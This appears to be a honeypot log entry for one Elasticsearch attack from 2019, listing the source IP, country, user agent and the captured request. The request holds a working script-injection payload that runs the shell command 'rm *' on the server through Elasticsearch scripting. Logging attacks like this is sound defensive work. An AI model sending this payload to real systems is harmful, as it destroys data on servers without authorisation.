Attack 7e5aee75-b22f-4134-a05a-aec5aa021efe
Details
ID |
7e5aee75-b22f-4134-a05a-aec5aa021efe |
Attack Type |
elasticsearch |
IP Address |
160.124.155.144 |
Username |
|
Password |
|
Client Version |
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
Country |
South Africa |
Date |
2019-01-18 02:00AM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "*/*",
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
"Cache-Control": "no-cache"
},
"hostname": "192.81.208.160:9200",
"form_data": {
"source": "{\"size\":1,\"query\":{\"filtered\":{\"query\":{\"match_all\":{}}}},\"script_fields\":{\"exp\":{\"script\":\"import java.util.*;\\nimport java.io.*;\\nString str = \\\"\\\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\\\"rm *\\\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();\"}}}"
}
}